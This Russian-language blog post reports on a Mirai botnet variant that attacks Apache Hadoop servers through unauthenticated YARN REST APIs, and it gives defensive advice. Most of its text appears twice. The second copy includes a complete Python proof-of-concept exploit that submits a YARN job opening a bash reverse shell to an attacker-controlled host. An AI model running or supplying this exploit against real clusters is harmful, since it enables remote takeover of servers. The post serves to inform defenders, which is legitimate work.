Ботнет Mirai появился в 2016 году и за короткое время успел заразить более 600 тыс. IoT-устройств. На прошлой неделе стало известно о новой версии Mirai, цель которой — Linux-серверы с Hadoop. Разбираемся, какую уязвимость использует вирус и как её «прикрыть».
/ Flickr / D J Shin / CC BY-SA
Mirai стал известен благодаря серии громких атак. Одна была на блог журналиста Брайана Кребса (Brian Krebs) после публикации статьи о продажах услуг ботнетов. Другая — на крупного DNS-провайдера Dyn, что вызвало сбой в работе мировых сервисов: Twitter, Reddit, PayPal, GitHub и многих других.
Для «захвата» IoT-устройств ботнет использовал уязвимость, связанную со слабыми паролями (производители делали их одинаковыми для всех смарт-девайсов). Вредонос мониторил интернет на наличие открытых telnet-портов и вводил перебором известные пары логин-пароль для доступа к учетной записи владельца устройства. В случае успеха гаджет становился частью «вредоносной сети».
В конце 2016 года разработчики выложили исходные коды вируса в сеть. Это привело к появлению ещё нескольких версий зловредного ПО, но все они делали своей целью устройства интернета вещей. До недавнего времени — теперь возник червь Mirai, который атакует Linux-серверы в дата-центрах.
Отчет о новой версии Mirai опубликовали специалисты по информационной безопасности компании NETSCOUT. Известно, что ботнет атакует серверы с установленным фреймворком Apache Hadoop. Как говорят специалисты по ИБ, хакеров привлекает мощность железа. Hadoop используется на серверах, занятых высокопроизводительными вычислениями и работой с алгоритмами машинного обучения. Сеть из производительных устройств позволит совершать более разрушительные DDoS-атаки.
Вариант Mirai для Linux по-прежнему взламывает системы путем подбора заводских учетных данных по telnet. Но теперь программе не нужно различать разные виды архитектур IoT-гаджетов, Mirai атакует только серверы с процессорами x86.
Вредонос использует для проникновения на сервер уязвимость модуля YARN, отвечающего за управление ресурсами кластеров и планирование заданий в Apache Hadoop.
При неверной конфигурации YARN атакующий может получить доступ к внутреннему REST API системы через порты 8088 и 8090. Подключаясь удаленно, злоумышленник получает возможность добавить в кластер новое приложение. К слову, об этой проблеме известно уже несколько лет — на ExploitDB и GitHub опубликованы PoC-эксплоиты.
Например, на GitHub представлен следующий код эксплойта:
Кроме Mirai, эту уязвимость использует другой DDoS-бот — DemonBot, который обнаружили в октябре специалисты компании Radware. С начала осени они регистрировали более миллиона попыток взлома через уязвимость YARN ежедневно.
По словам ИБ-специалистов, больше всего попыток взлома пришлось на США, Великобританию, Италию, Германию. На начало месяца уязвимости в YARN были подвержены чуть более тысячи серверов по всему миру. Это не так много, однако все они обладают высокой вычислительной мощностью.
Также есть информация, что уязвимость в Hadoop может предоставить злоумышленникам доступ к данным, которые хранятся на незащищенных серверах. Пока таких случаев зарегистрировано не было, но эксперты предупреждают, что это лишь вопрос времени.
Новый вариант Mirai распространяется не быстро — ежедневно происходит лишь несколько десятков тысяч попыток взломать Hadoop-машины через YARN. Причем все атаки идут с небольшого числа IP-адресов — не более сорока.
/ Flickr / Jelene Morris / CC BY
Такое поведение злоумышленников и натолкнуло специалистов NETSCOUT на мысль, что вирус распространяется не автоматически — хакеры вручную сканируют интернет и внедряют программу на незащищенные машины. Это означает, что у владельцев серверов с установленным Hadoop есть больше времени на закрытие уязвимости.
Для защиты от атаки нужно изменить настройки безопасности сети. Администраторам достаточно ограничить доступ к вычислительному кластеру — настроить IP-фильтры или полностью закрыть сеть от внешних пользователей и приложений.
Чтобы предотвратить неавторизованный доступ к системе, специалисты по безопасности также советуют обновить Hadoop до версии 2.x и включить аутентификацию через протокол Kerberos.
Несколько постов из блога VAS Experts:
Пара свежих материалов из нашего блога на Хабре:
/ Flickr / D J Shin / CC BY-SA
Пара слов о Mirai
Mirai стал известен благодаря серии громких атак. Одна была на блог журналиста Брайана Кребса (Brian Krebs) после публикации статьи о продажах услуг ботнетов. Другая — на крупного DNS-провайдера Dyn, что вызвало сбой в работе мировых сервисов: Twitter, Reddit, PayPal, GitHub и многих других.
Для «захвата» IoT-устройств ботнет использовал уязвимость, связанную со слабыми паролями (производители делали их одинаковыми для всех смарт-девайсов). Вредонос мониторил интернет на наличие открытых telnet-портов и вводил перебором известные пары логин-пароль для доступа к учетной записи владельца устройства. В случае успеха гаджет становился частью «вредоносной сети».
В конце 2016 года разработчики выложили исходные коды вируса в сеть. Это привело к появлению ещё нескольких версий зловредного ПО, но все они делали своей целью устройства интернета вещей. До недавнего времени — теперь возник червь Mirai, который атакует Linux-серверы в дата-центрах.
Ботнет «вербует» Linux
Отчет о новой версии Mirai опубликовали специалисты по информационной безопасности компании NETSCOUT. Известно, что ботнет атакует серверы с установленным фреймворком Apache Hadoop. Как говорят специалисты по ИБ, хакеров привлекает мощность железа. Hadoop используется на серверах, занятых высокопроизводительными вычислениями и работой с алгоритмами машинного обучения. Сеть из производительных устройств позволит совершать более разрушительные DDoS-атаки.
Вариант Mirai для Linux по-прежнему взламывает системы путем подбора заводских учетных данных по telnet. Но теперь программе не нужно различать разные виды архитектур IoT-гаджетов, Mirai атакует только серверы с процессорами x86.
При этом новый ботнет не ставит вредоносное ПО на взломанное устройство самостоятельно. Червь отправляет злоумышленникам IP-адрес уязвимой машины и пару логин-пароль для неё. Затем хакеры устанавливают DDoS-ботов вручную.
Какую уязвимость используют
Вредонос использует для проникновения на сервер уязвимость модуля YARN, отвечающего за управление ресурсами кластеров и планирование заданий в Apache Hadoop.
При неверной конфигурации YARN атакующий может получить доступ к внутреннему REST API системы через порты 8088 и 8090. Подключаясь удаленно, злоумышленник получает возможность добавить в кластер новое приложение. К слову, об этой проблеме известно уже несколько лет — на ExploitDB и GitHub опубликованы PoC-эксплоиты.
Например, на GitHub представлен следующий код эксплойта:
#!/usr/bin/env python
import requests
target = 'http://127.0.0.1:8088/'
lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
},
},
'application-type': 'YARN',
}
requests.post(url, json=data)
Кроме Mirai, эту уязвимость использует другой DDoS-бот — DemonBot, который обнаружили в октябре специалисты компании Radware. С начала осени они регистрировали более миллиона попыток взлома через уязвимость YARN ежедневно.
Что говорят эксперты
По словам ИБ-специалистов, больше всего попыток взлома пришлось на США, Великобританию, Италию, Германию. На начало месяца уязвимости в YARN были подвержены чуть более тысячи серверов по всему миру. Это не так много, однако все они обладают высокой вычислительной мощностью.
Также есть информация, что уязвимость в Hadoop может предоставить злоумышленникам доступ к данным, которые хранятся на незащищенных серверах. Пока таких случаев зарегистрировано не было, но эксперты предупреждают, что это лишь вопрос времени.
Новый вариант Mirai распространяется не быстро — ежедневно происходит лишь несколько десятков тысяч попыток взломать Hadoop-машины через YARN. Причем все атаки идут с небольшого числа IP-адресов — не более сорока.
/ Flickr / Jelene Morris / CC BY
Такое поведение злоумышленников и натолкнуло специалистов NETSCOUT на мысль, что вирус распространяется не автоматически — хакеры вручную сканируют интернет и внедряют программу на незащищенные машины. Это означает, что у владельцев серверов с установленным Hadoop есть больше времени на закрытие уязвимости.
Для защиты от атаки нужно изменить настройки безопасности сети. Администраторам достаточно ограничить доступ к вычислительному кластеру — настроить IP-фильтры или полностью закрыть сеть от внешних пользователей и приложений.
Чтобы предотвратить неавторизованный доступ к системе, специалисты по безопасности также советуют обновить Hadoop до версии 2.x и включить аутентификацию через протокол Kerberos.
Несколько постов из блога VAS Experts:
- Ботнет «спамит» через роутеры — что нужно знать
- Внедрение IPv6 — FAQ для интернет-провайдеров
- DDOS и 5G: толще «труба» — больше проблем
Пара свежих материалов из нашего блога на Хабре:
sshikov
>обновить Hadoop до версии 2.x
Слабо верится, что на сегодня есть такие, кто все еще живет на версиях более старых. У нас сейчас 2.6, и это уже приличное старье (с тех пор вышло версий пять наверное).
Ну и самое главное — те, у кого порты Yarn REST торчат наружу неприкрытые ничем — ССЗБ по определению. Ибо Yarn это планировщик задач Hadoop, запуск приложений — это его основное назначение. Это ровно тоже самое, что открыть ssh для доступа без пароля.
И еще можно Webhdfs открыть, совсем уж для полноты картины :)